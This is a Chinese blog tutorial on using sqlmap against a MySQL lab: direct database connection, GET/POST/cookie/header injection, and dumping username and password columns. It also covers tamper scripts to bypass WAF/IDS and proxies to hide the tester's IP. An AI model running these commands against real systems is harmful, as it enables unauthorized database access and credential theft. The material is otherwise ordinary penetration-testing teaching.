sqlmap确定目标/实操

最新推荐文章于 2024-08-07 15:58:40 发布
最新推荐文章于 2024-08-07 15:58:40 发布
阅读量2.4k 收藏 24
点赞数 61
分类专栏: 网络安全攻防基础 文章标签: oracle 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ting_liang/article/details/140347352
版权

安装kalikali自带sqlmap,在window系统中跟linux系统操作有区别

sqlmap是一款自动化SQL工具,打开kali终端,输入sqlmap,出现以下界面,就说明sqlmap可用

sqlmap确定目标

一、sqlmap直连数据库

1、直连数据库获得旗标

sqlmap -d "mysql://root:123456@192.168.137.111:3306/dbb7" -f --banner

说明:

  • -d 或 --ds 参数用于指定数据库的连接字符串。
  • mysql://:指定了数据库的类型是MySQL。
  • root:123456:这是数据库的用户名和密码,分别是root和123456。
  • @192.168.137.111:指定了数据库的服务器IP地址,这里是192.168.137.111。
  • :3306:指定了数据库服务器的端口号,MySQL的默认端口是3306。
  • /dbb7:指定了要连接的数据库名称,这里是dbb7。
  • --banner:这个选项指示sqlmap尝试检索并显示数据库的版本信息(即“banner”)。这对于了解目标数据库的类型和版本非常有用,因为不同的数据库类型和版本可能有不同的漏洞和弱点。

2、直连数据库获取用户及权限

sqlmap -d "mysql://root:123456@192.168.137.111:3306/dbb7" -f --banner -users

二、sqlmap实操

1sqlmap完整的get注入

        sqlmap直接对单一的url探测,参数使用-u或者--url

  • 1、检测注入点

        sqlmap -u 'http://xx/?id=1'

  • 2、查看所有数据库

        sqlmap -u 'http://xx/?id=1' --dbs --batch

  • 3、查看当前使用的数据库

        sqlmap -u 'http://xx/?id=1' --current -db --batch

  • 4、查看表名

        sqlmap -u 'http://xx/?id=1' -D 'security' --tables --batch

  • 5、查看字段

        sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' --columns --batch

  • 6、查看数据

        sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' --dump --batch

  • 7、查看字段值

        sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' -C 'username,password' --dump --batch

2、参数说明

指定数据库/表/字段

  • -D 指定目标「数据库」,单/双引号包裹,常配合其他参数使用。
  • -T 指定目标「表」,单/双引号包裹,常配合其他参数使用。
  • -C 指定目标「字段」,单/双引号包裹,常配合其他参数使用。

如:sqlmap -u 'http://xx/?id=1'  -D  'security'  -T  'users'  -C  'username' --dump

2、post请求

sqlmap探测post盲注

步骤一:获取http请求生成test.txt文件

步骤二:使用基于时间技术的sqlmap探测-r

如:sqlmap -r test.txt --technique T -p uname

检测post请求的注入点,使用BP等工具抓包,将http请求内容保存到txt文件中。

-r 指定需要检测的文件,SQLmap会通过post请求方式检测目标。

如:sqlmap -r test.txt

3、cookie注入

--cookie 指定cookie的值,单/双引号包裹。

如:sqlmap -u "http://xx?id=x" --cookie 'cookie'

4sqlmap进行http头注入

指定注入位置进行注入,在保存的文件中,对于参数的修改为*,保存在txt文档中

再进行sqlmap -r /root/test.txt

5sqlmap tamper脚本注入

--tamper 指定绕过脚本,绕过WAF或ids等。

sqlmap内置了很多绕过脚本,在 /usr/share/sqlmap/tamper/ 目录下

如:sqlmap -u 'http://xx/?id=1' --tamper 'uppercase.py'

三、sqlmap其他参数

(1)常见参数
  • --method=GET 指定请求方式(GET/POST)
  • --random-agent 随机切换UA(User-Agent)
  • --user-agent '  ' 使用自定义的UA(User-Agent)
  • --referer '  ' 使用自定义的 referer
  • --threads 10 设置线程数,最高10
(2)性能优化参数
  • --keep-alive 设置持久连接,加快探测速度
  • --null-connection 检索没有body响应的内容,多用于注
  • --thread 最大为10 设置多线程
  • -o开启所有默认性能优化
  • -smart 快速判断,节约时间
  • 设置延迟 --delay 时间。当页面无变化,布尔无真假,从来不报错时用延时注入
  • 设置超时 --timeout 时间
  • 设置重新连接次数--retries 次数
(3)等级参数
  • --batch 自动选择yes。
  • --level=1 执行测试的等级(1-5,默认为1,常用3)
  • --risk=1 风险级别(0~3,默认1,常用1),级别提高会增加数据被篡改的风险。
(4)代理参数

隐藏自己的真实ip

  • --proxy http://ip: 端口
  • --proxy -file 使用一个包含多条代理的文件中的代理

ting~liang
关注
  • 61
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 10
    评论
专栏目录
第二节 Sqlmap 确定目标-01
09-15
Sqlmap 确定目标-01 Sqlmap 是一款功能强大且灵活的 SQL 注入工具,能够自动检测和利用 SQL 注入漏洞。Sqlmap 的主要功能包括直连数据库、URL 探测、文件读取目标和 Google 批量扫注入等。下面将详细介绍 Sqlmap 的...
SQLmap压缩包,SQLmap压缩包
06-07
使用SQLmap时,你需要了解基本的命令行选项,例如指定目标URL、选择测试方法、设置代理等。同时,了解如何正确和合法地使用这个工具至关重要,避免对未经授权的系统进行测试,以免触犯法律。 总的来说,SQLmap是一...
sqlmap手册.zip
06-09
sqlmap用户手册,sqlmap命令详解,多文档,更详细 1. ./sqlmap.py -u http://www.evil0x.com/ test.php?p=2 -f -b –current-user –current-db –users –passwords –dbs -v 0 2. ./sqlmap.py -u ...
sqlmap扫描网站工具
04-03
- **文件系统访问**:在某些情况下,SQLMap可以读取或写入目标服务器的文件系统。 - **命令执行**:如果服务器配置不当,SQLMap可以尝试执行操作系统命令。 - **多线程**:支持多线程,加快扫描速度。 - **...
Mac电脑安装sqlmap及环境配置.docx
05-13
Mac 电脑安装 sqlmap 及环境配置 在本文中,我们将介绍如何在 Mac 电脑上安装 sqlmap 并进行环境配置。sqlmap 是一个开源的渗透测试工具,能够自动检测和exploit SQL 注入漏洞。 安装 sqlmap 首先,我们需要从 ...
mysql数据库数据库,表和列的基本概念
mohanyelong的博客
08-04 981
数据库,表和列的基本概念以及导入和导出文件。
MySQL数据管理 - 查询语句
今晚看星星的博客
08-04 839
运行的逻辑,在行上进行相加,然后在列上进行求平均,聚合函数还是聚合的列,聚合函数和分组常常在一起使用。根据两个表和多个表之间的关系进行查询和展示数据,使用JOIN语句实现。数据库最常用的操作就是查询,也是数据操作的基础,进行重点学习介绍。求平均值,最大值,最小值,求和,都是对查询的列的值进行运算。子查询将一个查询的结果用作数据库语句的条件。展示仓库和工人的关系,使用了工作关系联结。如果需要对多列进行聚合,此时需要使用。【注意】对每个学生进行分组查询,使用。,对不同列的数采取运算操作。
oracle数据库基本使用
weixin_54799594的博客
08-03 685
学习笔记
5 mysql 查询语句
qq_45725890的博客
08-02 346
提示:Execute执行 Execute and Suppress 执行并且抑制这个警告。有的只显示分组后第一个数据。person表的结构。
SQL Server数据库文件过大而无法直接导出解决方案
战族狼魂的博客
08-04 312
有些第三方工具可以提供更加灵活和高效的备份和恢复功能,例如Redgate的SQL Backup,Idera的SQL Safe Backup等。如果数据库使用了文件组,则可以备份单个文件组或单个数据文件。这种方式可以让你在需要恢复时,只恢复特定的文件组或文件。SQL Server支持压缩备份,压缩后的备份文件会更小,从而减少了单个备份文件的大小。部分备份是一种备份数据库子集的方法,特别适用于具有只读文件组的大型数据库。这样,数据库的备份将被分割成多个部分存储在不同的文件中。
03 库的操作
qq_43422358的博客
08-04 697
创建数据库时有两个编码集,分为数据库编码集和校验集,编码集市数据库存储数据时使用的,椒盐基支持数据库比较使用的编码,本质是一种读取数据库中采用的编码格式。创建一个数据库,校验规则用utf8_general_ci[不区分大小写],下面的操作是创建数据库,创建person表,插入四条数据。备份有最直接的方法,将数据库文件拷贝,但是这样遇到版本不同的sql可能会出现错误,mysql提供了备份的方法。打开备份文件,里面都是数据库操作的语句,建库,建表,导入数据的语句都在里面。
LeetCode题练习与总结:查找重复的电子邮箱--182
一直学习永不止步
08-03 784
本文详细介绍了如何使用SQL查询语句来报告重复的电子邮件,包括解题思路、具体代码实现、时间复杂度与空间复杂度分析,并总结了涉及的关键知识点,为解决类似问题提供了指导。
SQL基础语句入门指南
hs_1024的博客
08-04 603
以上就是SQL基础语句的入门介绍。当然,SQL的功能远不止于此,但它为你打开了一扇通往数据库世界的大门。随着你对SQL的深入学习,你将能够执行更复杂的数据查询、数据分析和数据操作任务。无论是为了工作还是学习,掌握SQL都是一项非常有价值的技能。希望这篇博客能够成为你SQL学习之旅的良好起点!
人大金仓(Kingbase)数据库高阶函数详解
微笑听雨
08-03 1500
本文深入探讨了人大金仓(Kingbase)数据库中的高阶函数,包括递归查询、数学函数、集合操作符、字符串函数、JSON 函数、时间函数、聚合函数、地理空间函数和窗口函数。每种函数的介绍都配备了详细的示例和解释,以展示其实际应用和操作细节。这些高阶函数不仅扩展了数据处理的能力,还使得复杂的数据分析和操作变得更加高效和灵活。通过掌握这些函数,开发者能够更好地处理层级数据、进行数学运算、操作字符串和JSON数据、处理时间信息、执行聚合分析、处理地理空间数据,以及利用窗口函数进行高级统计分析。
Oracle 高阶函数与高级功能详解
微笑听雨
08-02 1820
Oracle 高阶函数提供了丰富的数据操作和分析功能,能够极大地提升 SQL 查询的灵活性和效率。本文将详细介绍一些常用的 Oracle 高阶函数,包括分析函数、窗口函数、集合操作符、递归查询、正则表达式函数,以及字符串函数、日期和时间函数、数学函数等。
AT、TCC、SAGA 和 XA 事务模式
最新发布
宋发元
08-07 590
选择合适的分布式事务模式需要根据具体的业务需求和技术背景来决定。AT 适合简单业务场景,TCC 适合复杂且对性能要求高的业务,SAGA 适合长事务,而 XA 适合对一致性要求极高的金融领域。
高并发下的分布式缓存 | Cache-Aside缓存模式
大厂小码农的博客
08-07 917
在高并发的场景下,如果我们在更新数据时采用先使缓存失效,再更新数据库,如果某个时刻,同时有一个读请求和一个更新请求操作同一条数据,更新请求刚好让这条数据在缓存失效,然后读请求读取时缓存未命中(因为数据已被更新请求从缓存中删除),就会从数据库中获取旧数据并添加到缓存中。因此,代码需要实现重试机制。如果缓存中没有需要的数据,这叫做缓存未命中,这种情况下,应用程序需要从数据库中获取这个数据,从数据库中拿到数据后,应用程序还会将数据存入缓存,以便下次再需要这个数据时,可以直接从缓存里获取,而不需要再去查数据库
【已解决】关于MyBatis的collection集合中只能取到一条数据的问题
初夏0811的博客
08-03 237
在涉及多表查询的时候,使用collection元素来映射集合属性时,出现了只能查询到一条数据的情况,但用sql语句在数据库中查询会有多条记录。
【案例38】Can’t get connection from database 排查详细记录
Z.Virgil的博客
08-07 406
15、怀疑驱动程序有问题,把相关驱动替换到nchome中,发现测试不通过,经过咨询得知12.2版本的驱动基于的jdk编译版本过高用不了。删除掉冗余代码后,再次测试,测试通过。17、这类问题,之前很多碰到的是dns解析不通过,于是检查了IPV4的DNS解析配置地址发现里面配置了DNS解析地址为公网地址,但是服务器未开通公网。与顾问电话沟通发现,此数据库是客户从8i一直升级到12C的,非直接安装的12C版本。6、查询了process参数发现配置为150,很低,扩展到2000,重启了数据库服务,问题依旧未解决。
为了在系统中可以方便去执行sqlmap可修改/etc/profile文件alias sqlmap='python /root/sqlmapproject-sqlmap-6a1e0fb/sqlmap.py'#根据实际路径
05-29
要在系统中方便地执行sqlmap,您可以将其添加为系统别名(alias)。具体操作步骤如下: 1. 打开终端,进入/etc目录,找到profile文件,并用编辑器打开该文件。 2. 在profile文件中添加以下代码: ``` alias sqlmap='python /root/sqlmapproject-sqlmap-6a1e0fb/sqlmap.py' ``` 这行代码将创建一个名为sqlmap的别名,使得每次输入"sqlmap"时都会执行"python /root/sqlmapproject-sqlmap-6a1e0fb/sqlmap.py"命令。 3. 保存并关闭文件,执行以下命令使更改生效: ``` source /etc/profile ``` 现在,您只需要在终端中输入"sqlmap"命令就可以方便地执行sqlmap了。
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ting~liang

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值